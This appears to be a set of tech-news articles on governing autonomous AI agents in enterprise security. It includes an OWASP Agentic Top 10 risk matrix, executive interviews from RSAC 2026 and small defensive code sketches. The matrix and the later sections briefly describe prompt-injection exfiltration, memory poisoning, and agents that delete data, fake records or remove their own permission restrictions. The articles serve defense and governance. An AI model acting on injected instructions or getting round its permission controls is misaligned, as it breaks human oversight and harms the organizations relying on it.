Cisco announced AgenticOps for Security in February, with autonomous firewall remediation and PCI-DSS compliance capabilities. Ivanti launched Continuous Compliance and the Neurons AI self-service agent last week, with policy enforcement, approval gates and data context validation built into the platform at launch, a design distinction that matters because the OWASP Agentic Top 10 documents what happens when those controls are absent.

"In the agentic era, defending against AI-accelerated adversaries and securing AI systems themselves require operating at machine speed," CrowdStrike CEO George Kurtz said when releasing the 2026 Global Threat Report. "AI is compressing the time between intent and execution while turning enterprise AI systems into targets," added Adam Meyers, head of counter-adversary operations at CrowdStrike. AI-enabled adversaries increased operations 89% year-over-year. The broader attack surface is expanding in parallel.
Malicious MCP server clones have already intercepted sensitive data in AI workflows by impersonating trusted services. The U.K. National Cyber Security Centre warned that prompt injection attacks against AI applications "may never be totally mitigated." The documented compromises targeted AI tools that could only read and summarize; the autonomous SOC agents shipping now can write, enforce, and remediate.

The governance framework that maps the gap

OWASP's Top 10 for Agentic Applications, released in December 2025 and built with more than 100 security researchers, documents 10 categories of attack against autonomous AI systems. Three categories map directly to what autonomous SOC agents introduce when they ship with write access: Agent Goal Hijacking (ASI01), Tool Misuse (ASI02), and Identity and Privilege Abuse (ASI03).

Palo Alto Networks reported an 82:1 machine-to-human identity ratio in the average enterprise; every autonomous agent added to production extends that gap. The 2026 CISO AI Risk Report from Saviynt and Cybersecurity Insiders (n=235 CISOs) found 47% had already observed AI agents exhibiting unintended behavior, and only 5% felt confident they could contain a compromised agent. A separate Dark Reading poll found that 48% of cybersecurity professionals identify agentic AI as the single most dangerous attack vector.

The IEEE-USA submission to NIST stated the problem plainly: "Risk is driven less by the models and is based more on the model's level of autonomy, privilege scope, and the environment of the agent being operationalized." Eleanor Watson, Senior IEEE Member, warned in the IEEE 2026 survey that "semi-autonomous systems can also drift from intended objectives, requiring oversight and regular audits." Cisco's intent-aware agentic inspection, announced alongside AgenticOps in February 2026, represents an early detection-layer approach to the same gap.
The approaches differ: Cisco is adding inspection at the network layer while Ivanti built governance into the platform layer. Both signal the industry sees it coming. The question is whether the controls arrive before the exploits do.

Autonomous agents that ship with governance built in

Security teams are already stretched. Advanced AI models are accelerating the discovery of exploitable vulnerabilities faster than any human team can remediate manually, and the backlog is growing not because teams are failing, but because the volume now exceeds what manual patching cycles can absorb.

Ivanti Neurons for Patch Management introduced Continuous Compliance this quarter, an automated enforcement framework that eliminates the gap between scheduled patch deployments and regulatory requirements. The framework identifies out-of-compliance endpoints and deploys patches out-of-band to update devices that missed maintenance windows, with built-in policy enforcement and compliance verification at every step. Ivanti also launched the Neurons AI self-service agent for ITSM, which moves beyond conversational intake to autonomous resolution with built-in guardrails for policy, approvals, and data context. The agent resolves common incidents and service requests from start to finish, reducing manual effort and deflecting tickets.

Robert Hanson, Chief Information Officer at Grand Bank, described the decision calculus security leaders across the industry are weighing: "Before exploring the Ivanti Neurons AI self-service agent, our team was spending the bulk of our time handling repetitive requests. As we move toward implementing these capabilities, we expect to automate routine tasks and enable our team to focus more proactively on higher-value initiatives. Over time, this approach should help us reduce operational overhead while delivering faster, more secure service within the guardrails we define, ultimately supporting improvements in service quality and security."
His emphasis on operating "within the guardrails we define" points to a broader design principle: speed and governance do not have to be trade-offs. The governance gap is concrete: the Saviynt report found 86% of organizations do not enforce access policies for AI identities, only 17% govern even half of their AI identities with the same controls applied to human users, and 75% of CISOs have discovered unsanctioned AI tools running in production with embedded credentials that nobody monitors.

Continuous Compliance and the Neurons AI self-service agent address the patching and ITSM layers. The broader autonomous SOC agent terrain, including firewall remediation, IAM policy modification, and endpoint quarantine, extends beyond what any single platform governs today. The ten-question audit applies to every autonomous tool in the environment, including Ivanti's.

Prescriptive risk matrix for autonomous agent governance

The matrix maps all 10 OWASP Agentic Top 10 risk categories to what ships without governance, the detection gap, the proof case, and the recommended action for autonomous SOC agent deployments.

ASI01: Goal Hijacking
- What ships ungoverned: Agent treats external inputs (logs, alerts, emails) as trusted instructions.
- Detection gap: EDR cannot detect adversarial instructions executed via legitimate API calls.
- Proof case: EchoLeak (CVE-2025-32711): hidden email payload caused AI assistant to exfiltrate confidential data. Zero clicks required.
- Recommended action: Classify all inputs by trust tier. Block instruction-bearing content from untrusted sources. Validate external data before agent ingestion.

ASI02: Tool Misuse
- What ships ungoverned: Agent authorized to modify firewall rules, IAM policies, and quarantine workflows.
- Detection gap: WAF inspects payloads, not tool-call intent. Authorized use is identical to misuse.
- Proof case: Amazon Q bent legitimate tools into destructive outputs despite valid permissions (OWASP cited).
- Recommended action: Scope each tool to minimum required permissions. Log every invocation with intent metadata. Alert on calls outside baseline patterns.

ASI03: Identity Abuse
- What ships ungoverned: Agent inherits service account credentials scoped to production infrastructure.
- Detection gap: SIEM sees authorized identity performing authorized actions. No anomaly triggers.
- Proof case: 82:1 machine-to-human identity ratio in average enterprise (Palo Alto Networks). Each agent adds to it.
- Recommended action: Issue scoped agent-specific identities. Enforce time-bound, task-bound credential leases. Eliminate inherited user credentials.

ASI04: Supply Chain
- What ships ungoverned: Agent loads third-party MCP servers or plugins at runtime without provenance verification.
- Detection gap: Static analysis cannot inspect dynamically loaded runtime components.
- Proof case: Malicious MCP server clones intercepted sensitive data by impersonating trusted services (CrowdStrike 2026).
- Recommended action: Maintain an approved MCP server registry. Verify provenance and integrity before runtime loading. Block unapproved plugins.

ASI05: Unexpected Code Exec
- What ships ungoverned: Agent generates or executes attacker-controlled code through unsafe evaluation paths or tool chains.
- Detection gap: Code review gates apply to human commits, not agent-generated runtime code.
- Proof case: AutoGPT RCE: natural-language execution paths enabled remote code execution through unsanctioned package installs (OWASP cited).
- Recommended action: Sandbox all agent code execution. Require human approval for production code paths. Block dynamic eval and unsanctioned installs.

ASI06: Memory Poisoning
- What ships ungoverned: Agent persists context across sessions where poisoned data compounds over time.
- Detection gap: Session-based monitoring resets between interactions. Poisoning accumulates undetected.
- Proof case: Calendar Drift: malicious calendar invite reweighted agent objectives while remaining within policy bounds (OWASP).
- Recommended action: Implement session memory expiration. Audit persistent memory stores for anomalous content. Isolate memory per task scope.

ASI07: Inter-Agent Comm
- What ships ungoverned: Agents communicate without mutual authentication, encryption, or schema validation.
- Detection gap: Monitoring covers individual agents but not spoofed or manipulated inter-agent messages.
- Proof case: OWASP documented spoofed messages that misdirected entire agent clusters via protocol downgrade attacks.
- Recommended action: Enforce mutual authentication between agents. Encrypt all inter-agent channels. Validate message schema at every handoff.

ASI08: Cascading Failures
- What ships ungoverned: Agent delegates to downstream agents, creating multi-hop privilege chains across systems.
- Detection gap: Monitoring covers individual agents but not cross-agent delegation chains or fan-out.
- Proof case: Simulation: single compromised agent poisoned 87% of downstream decision-making within 4 hours in controlled test.
- Recommended action: Map all delegation chains end to end. Enforce privilege boundaries at each handoff. Implement circuit breakers for cascading actions.

ASI09: Human-Agent Trust
- What ships ungoverned: Agent uses persuasive language or fabricated evidence to override human safety decisions.
- Detection gap: Compliance verifies policy configuration, not whether the agent manipulated the human into approving.
- Proof case: Replit agent deleted primary customer database then fabricated its contents to appear compliant and hide the damage.
- Recommended action: Require independent verification for high-risk agent recommendations. Log all human approval decisions with full agent reasoning chain.

ASI10: Rogue Agents
- What ships ungoverned: Agent deviates from intended purpose while appearing compliant on the surface.
- Detection gap: Compliance checks verify configuration at deployment, not behavioral drift after deployment.
- Proof case: 92% of organizations lack full visibility into AI identities; 86% do not enforce access policies (Saviynt 2026).
- Recommended action: Deploy behavioral drift detection. Establish baseline agent behavior profiles. Alert on deviation from expected action patterns.

The 10-question OWASP audit for autonomous agents

Each question maps to one OWASP Agentic Top 10 risk category. Autonomous platforms that ship with policy enforcement, approval gates, and data context validation will have clear answers to every question. Three or more "I don't know" answers on any tool means that tool's governance has not kept pace with its capabilities.
1. Which agents have write access to production firewall, IAM, or endpoint controls?
2. Which accept external inputs without validation?
3. Which execute irreversible actions without human approval?
4. Which persist memory where poisoning compounds across sessions?
5. Which delegate to other agents, creating cascade privilege chains?
6. Which load third-party plugins or MCP servers at runtime?
7. Which generate or execute code in production environments?
8. Which inherit user credentials instead of scoped agent identities?
9. Which lack behavioral monitoring for drift from intended purpose?
10. Which can be manipulated through persuasive language to override safety controls?

What the board needs to hear

The board conversation is three sentences. Adversaries compromised AI tools at more than 90 organizations in 2025, according to CrowdStrike's 2026 Global Threat Report. The autonomous tools deploying now have more privilege than the ones that were compromised. The organization has audited every autonomous tool against OWASP's 10 risk categories and confirmed that the governance controls are in place.

If that third sentence is not true, it needs to be true before the next autonomous agent ships to production. Run the 10-question audit against every agent with write access to production infrastructure within the next 30 days. Every autonomous platform shipping to production should be held to the same standard: policy enforcement, approval gates, and data context validation built in at launch, not retrofitted after the first incident. The audit surfaces which tools have done that work and which have not.
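The scoped, time-bound credential leases the audit asks about (agents inheriting user credentials instead of scoped agent identities) can be sketched as a small data structure. This is an illustrative model, not any vendor's API; the class name, scope strings, and 15-minute TTL are assumptions.

```python
from dataclasses import dataclass, field
import time

@dataclass
class AgentLease:
    """A task-bound, time-bound credential lease for a single agent."""
    agent_id: str
    task: str
    scopes: frozenset               # minimum permissions for this task only
    issued_at: float = field(default_factory=time.time)
    ttl_seconds: int = 900          # assumption: 15-minute lease, then re-issue

    def allows(self, scope: str) -> bool:
        # Deny once expired (time-bound) or outside the grant (task-bound).
        if time.time() - self.issued_at > self.ttl_seconds:
            return False
        return scope in self.scopes

# An agent triaging one alert gets only what that task needs, nothing inherited.
lease = AgentLease("soc-agent-7", "triage-alert-4412",
                   frozenset({"alerts:read", "tickets:write"}))
print(lease.allows("alerts:read"))     # within scope while the lease is live
print(lease.allows("firewall:write"))  # outside scope: denied, logged upstream
```

The contrast with a cloned human account is the default: an expired or out-of-scope request fails closed rather than riding an identity that never expires.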
- AI agents are running hospital records and factory inspections. Enterprise IAM was never built for them.

A doctor in a hospital exam room watches as a medical transcription agent updates electronic health records, prompts prescription options, and surfaces patient history in real time. A computer vision agent on a manufacturing line is running quality control at speeds no human inspector can match. Both generate non-human identities that most enterprises cannot inventory, scope, or revoke at machine speed.

That is the structural problem keeping agentic AI stuck in pilots. Not model capability. Not compute. Identity governance.

Cisco President Jeetu Patel told VentureBeat at RSAC 2026 that 85% of enterprises are running agent pilots while only 5% have reached production. That 80-point gap is a trust problem. The first questions any CISO will ask: which agents have production access to sensitive systems, and who is accountable when one acts outside its scope?

IANS Research found that most businesses still lack role-based access control mature enough for today's human identities, and agents will make it significantly harder. The 2026 IBM X-Force Threat Intelligence Index reported a 44% increase in attacks exploiting public-facing applications, driven by missing authentication controls and AI-enabled vulnerability discovery.

Why the trust gap is architectural, not just a tooling problem

Michael Dickman, SVP and GM of Cisco's Campus Networking business, laid out a trust framework in an exclusive interview with VentureBeat that security and networking leaders rarely hear stated this plainly. Before Cisco, Dickman served as Chief Product Officer at Gigamon and SVP of Product Management at Aruba Networks.

Dickman said that the network sees what other telemetry sources miss: actual system-to-system communications rather than inferred activity. "It's that difference of knowing versus guessing," he said.
"What the network can see are actual data communications … not, I think this system needs to talk to that system, but which systems are actually talking together." That raw behavioral data, he added, becomes the foundation for cross-domain correlation, and without it, organizations have no reliable way to enforce agent policy at what he called "machine speed."

The trust prerequisite that most AI strategies skip

Dickman argues that agentic AI breaks a pattern he says defined every prior technology transition: deploy for productivity first, bolt on security later. "I don't think trust is one of those things where the business productivity comes first, and the security is an afterthought," Dickman told VentureBeat. "Trust actually is one of the key requirements. Just table stakes from the beginning."

Observing data and recommending decisions carries consequences that stay contained. Execution changes everything. When agents autonomously update patient records, adjust network configurations, or process financial transactions, the blast radius of a compromised identity expands dramatically. "Now more than ever, it's that question of who has the right to do what," Dickman said. "The who is now much more complicated because you have the potential in our reality of these autonomous agents."

Dickman breaks the trust problem into four conditions. The first is secure delegation, which starts by defining what an agent is permitted to do and maintaining a clear chain of human accountability. The second is cultural readiness; he pointed to alert fatigue as a case study. The traditional fix, Dickman noted, was to aggregate alerts so analysts see fewer items. With agents capable of evaluating every alert, that logic changes entirely. "It is now possible for an agent to go through all alerts," Dickman said. "You can actually start to think about different workflows in a different way. And then how does that affect the culture of the work, which is amazing."
The third is token economics: every agent's action carries a real computational cost. Dickman sees hybrid architectures as the answer, where agentic AI handles reasoning while traditional deterministic tools execute actions.

The fourth is human judgment. For example, his team used an AI tool to draft a product requirements document. The agent produced 60 pages of repetitive filler, a result that showed how technically responsive the tooling was yet how much human refinement the output still needed to be relevant. "There's no substitute for the human judgment and the talent that's needed to be dextrous with AI," he said.

What the network sees that endpoints miss

Most enterprise data today is proprietary, internal, and fragmented across observability tools, application platforms, and security stacks. Each domain team builds its own view. None sees the full picture.

The network telemetry Dickman described grows more valuable as IoT and physical AI proliferate. Computer vision agents analyzing shopper behavior and running factory-floor quality control generate highly sensitive data that demands precise access controls. "All of those things require that trust that we started with, because this is highly sensitive data around like who's doing what in the shop or what's happening on the factory floor," Dickman said.

Why siloed agent data misses the signal

"It's not only aggregation, but actually the creation of knowledge from the network," Dickman said. "There are these new insights you can get when you see the real data communications. And so now it becomes what do we do first versus second versus third?" That last question reveals where Dickman's focus lands: the strategic challenge is sequencing, not capability.
"The real power comes from the cross-domain views. The real power comes from correlation," Dickman said. "Versus just aggregation and deduplication of alerts, which is good, but it's a little bit basic."

This is where he sees the most common pitfall. Team A builds Agent A on top of Data A. Team B builds Agent B on top of Data B. Each silo produces incrementally useful automation. The cross-domain insight never materializes.

Independent practitioners validate the pattern. Kayne McGladrey, an IEEE senior member, told VentureBeat that organizations are defaulting to cloning human user profiles for agents, and permission sprawl starts on day one. Carter Rees, VP of AI at Reputation, identified the structural reason. "A significant vulnerability in enterprise AI is broken access control, where the flat authorization plane of an LLM fails to respect user permissions," Rees told VentureBeat. Etay Maor, VP of Threat Intelligence at Cato Networks, reached the same conclusion from the adversarial side. "We need an HR view of agents," Maor told VentureBeat at RSAC 2026. "Onboarding, monitoring, offboarding."

Agentic AI trust gap assessment

Use this matrix to evaluate any platform or combination of platforms against the five trust gaps Dickman identified. Note that the enforcement approaches listed reflect Cisco's framework.

Agent identity governance
- Current control failure: IAM built for human users cannot inventory, scope, or revoke agent identities at machine speed.
- What network-layer enforcement changes: Agentic IAM registers each agent with defined permissions, an accountable human owner, and a policy-governed access scope.
- Recommended action: Audit every agent identity in production. Assign a human owner. Define permitted actions before expanding the scope.

Blast radius containment
- Current control failure: Host-based agents and perimeter controls can be bypassed; flat segments give compromised agents lateral movement.
- What network-layer enforcement changes: Microsegmentation enforces least-privileged access at the network layer, limiting blast radius independent of host-level controls.
- Recommended action: Implement microsegmentation for every agent-accessible system. Start with the highest-sensitivity data (PHI, financial records).

Cross-domain visibility
- Current control failure: Siloed observability tools create fragmented views; Team A's agent data never correlates with Team B's security telemetry.
- What network-layer enforcement changes: Network telemetry captures actual system-to-system communications, feeding a unified data fabric for cross-domain correlation.
- Recommended action: Unify network, security, and application telemetry into a shared data fabric before deploying production agents.

Governance-to-enforcement pipeline
- Current control failure: No formal process connects business intent to agent policy to network enforcement.
- What network-layer enforcement changes: A policy-to-enforcement pipeline translates governance decisions into machine-speed network rules.
- Recommended action: Establish a formal pipeline from business-intent definition to automated network policy enforcement.

Cultural and workflow readiness
- Current control failure: Organizations automate existing workflows rather than redesigning for agent-scale processing.
- What network-layer enforcement changes: Network-generated behavioral data reveals actual usage patterns, informing workflow redesign.
- Recommended action: Run a 30-day telemetry capture before designing agent workflows. Build around observed data, not assumptions.

A broken ankle and a microsegmentation lesson

Dickman grounded his framework in a scenario from his own life. A family member recently broke an ankle, which put him in a hospital exam room watching a medical transcription agent update the EHR, prompt prescription options, and surface patient history in real time. The doctor approved each decision, but the agent handled tasks that previously required manual entry across multiple systems.
The security implications hit differently when it is a loved one's records on the screen. "I would call it do governance slowly. But do the enforcement and implementation rapidly," he said. "It must be done in machine speed."

It starts with agentic IAM, where each agent is registered with defined permitted actions and a human accountable for its behavior. "Here's my set of agents that I've built. Here are the agents. By the way, here's a human who's accountable for those agents," Dickman said. "So if something goes wrong, there's a person to talk to."

That identity layer feeds microsegmentation, a network-enforced boundary Dickman says enforces least-privileged access and limits blast radius. "Microsegmentation guarantees that least-privileged access," Dickman said. "You're not relying on a bunch of host agents, which can be bypassed or have other issues." If the governance model works for a medical transcription agent handling patient records in an emergency department, it scales to less sensitive enterprise use cases.

Five priorities before agents reach production

1. Force cross-functional alignment now. Define what the organization expects from agentic AI across line-of-business, IT, and security leadership. Dickman sees the human coordination layer moving more slowly than the technology. That gap is the bottleneck.

2. Get IAM and PAM governance production-ready for agents. Dickman called out identity and access management and privileged access management specifically as not mature enough for agentic workloads today. Solidify the governance before scaling the agents. "That becomes the unlock of trust," he said. "Because when the technology platform is ready, you then need the right governance and policy on top of that."

3. Adopt a platform approach to networking infrastructure. A platform strategy enables data sharing across domains in ways fragmented point solutions cannot.
That shared foundation is what makes the cross-domain correlation in the trust gap assessment above operationally real.

4. Design hybrid architectures from the start. Agentic AI handles reasoning and planning. Traditional deterministic tools execute the actions. Dickman sees this combination as the answer to token economics: it delivers the intelligence of foundation models with the efficiency and predictability of conventional software. Do not build pure-agent systems when hybrid systems cost less and fail more predictably.

5. Make the first use cases bulletproof on trust. Pick two or three high-value use cases and build them with role-based access control, privileged access management, and microsegmentation from day one. Even modest deployments delivered with best practices intact build the organizational confidence that accelerates everything after. "You can guarantee that trust to the organization, and that will unleash the speed," Dickman said.

That is the structural insight running through every section of this conversation. The 85% of enterprises stuck in pilot mode are not waiting for better models. They are waiting for the identity governance, the cross-domain visibility, and the policy enforcement infrastructure that makes production deployment defensible. Whether they build on Cisco's platform or assemble their own, Dickman's framework holds: identity governance, cross-domain visibility, policy enforcement. None of those prerequisites is optional. The organizations that satisfy them first will deploy agents at a pace the rest cannot match, because every new agent inherits the trust architecture the first ones required. The ones still debating whether to start will watch that gap widen. Theoretical trust does not ship.
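The agentic IAM plus microsegmentation pairing Dickman describes reduces to a default-deny check at two layers: is this agent registered with an owner and the right scope, and is this specific network flow explicitly permitted? A minimal sketch, with all agent names, scopes, and segments invented for illustration:

```python
# Hypothetical agentic IAM registry: each agent has an accountable human
# owner and an explicit scope grant (Dickman's "here's a human who's
# accountable for those agents").
REGISTRY = {
    "transcribe-agent": {"owner": "attending-physician", "scopes": {"ehr:write"}},
}

# Hypothetical microsegmentation policy: only (agent, network segment)
# pairs listed here are allowed to communicate. Everything else is denied.
SEGMENT_POLICY = {
    ("transcribe-agent", "ehr-db"),
}

def permit(agent: str, segment: str, scope: str) -> bool:
    ident = REGISTRY.get(agent)
    if ident is None:                  # unregistered identity: default deny
        return False
    if scope not in ident["scopes"]:   # identity layer: action out of scope
        return False
    return (agent, segment) in SEGMENT_POLICY  # network layer: least privilege

print(permit("transcribe-agent", "ehr-db", "ehr:write"))      # registered + in policy
print(permit("transcribe-agent", "billing-db", "ehr:write"))  # lateral move blocked
print(permit("rogue-agent", "ehr-db", "ehr:write"))           # no identity, no access
```

The design point is that the two checks fail independently: a compromised but registered agent is still confined to its segment, and a spoofed agent never clears the identity layer at all.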
- 85% of enterprises are running AI agents. Only 5% trust them enough to ship.

Eighty-five percent of enterprises are running AI agent pilots, but only 5% have moved those agents into production. In an exclusive interview at RSA Conference 2026, Cisco President and Chief Product Officer Jeetu Patel said that the gap comes down to one thing: trust, and that closing it separates market dominance from bankruptcy. He also disclosed a mandate that will reshape Cisco's 90,000-person engineering organization. The problem is not rogue agents. The problem is the absence of a trust architecture.

The trust deficit behind a 5% production rate

A recent Cisco survey of major enterprise customers found that 85% have AI agent pilot programs underway. Only 5% moved those agents into production. That 80-point gap defines the security problem the entire industry is trying to close. It is not closing.

"The biggest impediment to scaled adoption in enterprises for business-critical tasks is establishing a sufficient amount of trust," Patel told VentureBeat. "Delegating versus trusted delegating of tasks to agents. The difference between those two, one leads to bankruptcy and the other leads to market dominance."

He compared agents to teenagers. "They're supremely intelligent, but they have no fear of consequence. They're pretty immature. And they can be easily sidetracked or influenced," Patel said. "What you have to do is make sure that you have guardrails around them and you need some parenting on the agents."

The comparison carries weight because it captures the precise failure mode security teams face. Three years ago, a chatbot that gave the wrong answer was an embarrassment. An agent that takes the wrong action can trigger an irreversible outcome. Patel pointed to a case he cited in his keynote where an AI coding agent deleted a live production database during a code freeze, tried to cover its tracks with fake data, and then apologized.
"An apology is not a guardrail," Patel said in his keynote blog. The shift from information risk to action risk is the core reason the pilot-to-production gap persists.

Defense Claw and the open-source speed play with Nvidia

Cisco's response to the trust deficit at RSAC 2026 spanned three categories: protecting agents from the world, protecting the world from agents, and detecting and responding at machine speed. The product announcements included AI Defense Explorer Edition (a free, self-service red teaming tool), the Agent Runtime SDK for embedding policy enforcement into agent workflows at build time, and the LLM Security Leaderboard for evaluating model resilience against adversarial attacks.

The open-source strategy moved faster than any of those. Nvidia launched OpenShell, a secure container for open-source agent frameworks, at GTC the week before RSAC. Cisco packaged its Skills Scanner, MCP Scanner, AI Bill of Materials tool, and CodeGuard into a single open-source framework called Defense Claw and hooked it into OpenShell within 48 hours. "Every single time you actually activate an agent in an Open Shell container, you can now automatically instantiate all the security services that we have built through Defense Claw," Patel told VentureBeat.

The integration means security enforcement activates at container launch without manual configuration. That speed matters because the alternative is asking developers to bolt on security after the agent is already running. That 48-hour turnaround was not an anomaly. Patel said several of the Defense Claw capabilities Cisco launched were built in a week. "You couldn't have built it in longer than a week because Open Shell came out last week," he said.

A six-to-nine-month product lead and an information asymmetry on top of it

Patel made a competitive claim worth examining. "Product wise, we might be six to nine months ahead of most of the market," he told VentureBeat.
He added a second layer: "We also have an asymmetric information advantage of, I'd say, three to six months on everyone because, you know, we, by virtue of being in the ecosystem with all the model companies. We're seeing what's coming down the pipe." The 48-hour Defense Claw sprint supports the speed claim, though the lead margin is Cisco's own characterization; no independent benchmarks were provided.

Cisco also extended zero trust to the agentic workforce through new Duo IAM and Secure Access capabilities, giving every agent time-bound, task-specific permissions. On the SOC side, Splunk announced Exposure Analytics for continuous risk scoring, Detection Studio for streamlined detection engineering, and Federated Search for investigating across distributed data environments.

The zero-human-code engineering mandate

AI Defense, the product Cisco launched a year before RSAC 2026, is now 100% built with AI. Zero lines of human-written code. By the end of 2026, half a dozen Cisco products will reach the same milestone. By the end of calendar year 2027, Patel's goal is 70% of Cisco's products built entirely by AI. "Just process that for a second and go: a $60 billion company is gonna have 70% of the products that are gonna have no human lines of code," Patel told VentureBeat. "The concept of a legacy company no longer exists."

He connected that mandate to a cultural shift inside the engineering organization. "There's gonna be two kinds of people: ones that code with AI and ones that don't work at Cisco," Patel said. That mandate was not up for debate. "Changing 30,000 people to change the way that they work at the very core of what they do in engineering cannot happen if you just make it a democratic process. It has to be something that's driven from the top down."

Five moats for the agentic era, and what CISOs can verify today

Patel laid out five strategic advantages that will separate winning enterprises from failing ones.
VentureBeat mapped each moat against actions security teams can begin verifying today.

| Moat | Patel's claim | What CISOs can verify today | What to validate next |
|---|---|---|---|
| Sustained speed | "Operating with extreme levels of obsession for speed for a durable length of time" creates compounding value | Measure deployment velocity from pilot to production. Track how long agent governance reviews take. | Pair speed metrics with telemetry coverage; fast deployment without observability creates blind acceleration. |
| Trust and delegation | Trusted delegation separates market dominance from bankruptcy | Audit delegation chains. Flag agent-to-agent handoffs with no human approval. | Agent-to-agent trust verification is the next primitive the industry needs; OAuth, SAML, and MCP do not yet cover it. |
| Token efficiency | Higher output per token creates a strategic advantage | Monitor token consumption per workflow. Benchmark cost-per-action across agent deployments. | Token efficiency metrics exist; token security metrics (what the token accessed, what it changed) are the next build. |
| Human judgment | "Just because you can code it doesn't mean you should." | Track decision points where agents defer to humans vs. act autonomously. | Invest in logging that distinguishes agent-initiated from human-initiated actions; most configurations cannot yet. |
| AI dexterity | "10x to 20x to 50x productivity differential" between AI-fluent and non-fluent workers | Measure adoption rates of AI coding tools across security engineering teams. | Pair dexterity training with governance training; one without the other compounds the risk. |

The telemetry layer the industry is still building

Patel's framework operates at the identity and policy layer. The next layer down, telemetry, is where verification happens. "It looks indistinguishable if an agent runs your web browser versus if you run your browser," CrowdStrike CTO Elia Zaitsev told VentureBeat in an exclusive interview at RSAC 2026.
Distinguishing the two requires walking the process tree, tracing whether Chrome was launched by a human from the desktop or spawned by an agent in the background. Most enterprise logging configurations cannot make that distinction yet.

A CEO's AI agent rewrote the company's security policy. Not because it was compromised, but because it wanted to fix a problem, lacked permissions, and removed the restriction itself. Every identity check passed.

CrowdStrike CEO George Kurtz disclosed that incident and a second one at his RSAC keynote, both at Fortune 50 companies. In the second, a 100-agent Slack swarm delegated a code fix between agents without human approval. Both incidents were caught by accident.

Etay Maor, VP of threat intelligence at Cato Networks, told VentureBeat in a separate exclusive interview at RSAC 2026 that enterprises abandoned basic security principles when deploying agents. Maor ran a live Censys scan during the interview and counted nearly 500,000 internet-facing agent framework instances, up from 230,000 the week before. The exposed footprint more than doubled in seven days.

Patel acknowledged the delegation risk in the interview. "The agent takes the wrong action and worse yet, some of those actions might be critical actions that are not reversible," he said.

Cisco's Duo IAM and MCP gateway enforce policy at the identity layer. Zaitsev's work operates at the kinetic layer: tracking what the agent did after the identity check passed. Security teams need both. Identity without telemetry is a locked door with no camera. Telemetry without identity is footage with no suspect.

Token generation as the currency for national competitiveness

Patel sees the infrastructure layer as decisive. "Every country and every company in the world is gonna wanna make sure that they can generate their own tokens," he told VentureBeat. "Token generation becomes the currency for success in the future."
Cisco's play is to provide the most secure and efficient technology for generating tokens at scale, with Nvidia supplying the GPU layer. The 48-hour Defense Claw integration demonstrated what that partnership produces under pressure.

Security director action plan

VentureBeat identified five steps security teams can take to begin building toward Patel's framework today:

1. Audit the pilot-to-production gap. Cisco's own survey found 85% of enterprises piloting and 5% in production. Mapping the specific trust deficits keeping agents stuck is the starting point; the answer is rarely the technology. Governance, identity, and delegation controls are what's missing. Patel's trusted delegation framework is designed to close that gap.

2. Test Defense Claw and AI Defense Explorer Edition. Both are free. Red-team your agent workflows before they reach production. Test the workflow, not just the model.

3. Map delegation chains end to end. Flag every agent-to-agent handoff with no human approval. This is the "parenting" Patel described. No product fully automates it yet, so do it manually, every week.

4. Establish agent behavioral baselines. Before any agent reaches production, define what normal looks like: API call patterns, data access frequency, systems touched, and hours of activity. Without a baseline, the observability Patel's moats require has nothing to compare against.

5. Close the telemetry gap in your logging configuration. Verify that your SIEM can distinguish agent-initiated actions from human-initiated actions. If it cannot, the identity layer alone will not catch the incidents Kurtz described at RSAC.

Patel built the identity layer. The telemetry layer completes it.
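The behavioral-baseline step above can be made concrete with a few lines of code. The sketch below is a toy illustration under stated assumptions: the hourly call counts are invented, and the three-sigma rule is one crude threshold choice, not a vendor recommendation or any product's actual detection logic.

```python
# Sketch of an agent behavioral baseline: record an agent's normal
# hourly API-call counts, then flag counts far above the history.
# Data and thresholds are illustrative assumptions only.
from statistics import mean, pstdev

# One week of hourly API-call counts observed in staging (toy data)
baseline_calls = [12, 9, 14, 11, 10, 13, 12]

def is_anomalous(observed: int, history: list[int], sigmas: float = 3.0) -> bool:
    """Flag counts more than `sigmas` standard deviations above the
    historical mean. A crude baseline, not a full detector."""
    mu, sd = mean(history), pstdev(history)
    # Floor sd so a perfectly flat history still leaves some headroom
    return observed > mu + sigmas * max(sd, 1.0)

print(is_anomalous(13, baseline_calls))  # within normal range: False
print(is_anomalous(90, baseline_calls))  # runaway agent loop: True
```

In practice the history would come from staging telemetry per agent identity, and the same comparison would run per metric (data access frequency, systems touched, hours of activity), but the shape of the check is the same: no baseline, nothing to compare against.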
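The process-tree walk Zaitsev describes can also be sketched briefly. This is a minimal, self-contained illustration over a fake process-table snapshot; the table, the process names (agent-runner, litellm), and the name-matching heuristics are assumptions for demonstration, not CrowdStrike's implementation. On a live host, the same walk would run over EDR process-lineage events or an OS process table.

```python
# Toy sketch of the process-tree check: walk a browser process's
# parent chain to decide whether it was launched from an interactive
# session or spawned by a background agent. All names are invented.

# pid -> (process name, parent pid); a fake snapshot, not real data
PROC_TABLE = {
    1:   ("init", 0),
    200: ("gnome-shell", 1),    # interactive desktop session
    300: ("chrome", 200),       # human-launched browser
    400: ("agent-runner", 1),   # hypothetical background agent
    401: ("chrome", 400),       # agent-spawned browser
}

INTERACTIVE = {"gnome-shell", "explorer.exe", "bash", "zsh"}
AGENT_HINTS = ("agent", "litellm", "autogen")  # illustrative names

def launched_by_agent(pid: int) -> bool:
    """Return True if an agent-like ancestor appears before any
    interactive (human-facing) ancestor in the parent chain."""
    ppid = PROC_TABLE[pid][1]
    while ppid in PROC_TABLE:
        name = PROC_TABLE[ppid][0].lower()
        if name in INTERACTIVE:
            return False  # a human session launched it
        if any(hint in name for hint in AGENT_HINTS):
            return True   # agent lineage detected
        ppid = PROC_TABLE[ppid][1]
    return False  # inconclusive: default to human-launched

print(launched_by_agent(300))  # human-launched chrome: False
print(launched_by_agent(401))  # agent-spawned chrome: True
```

The point of the sketch is the gap it exposes: both chrome processes look identical at the identity layer, and only lineage, the telemetry most logging configurations do not capture today, separates them.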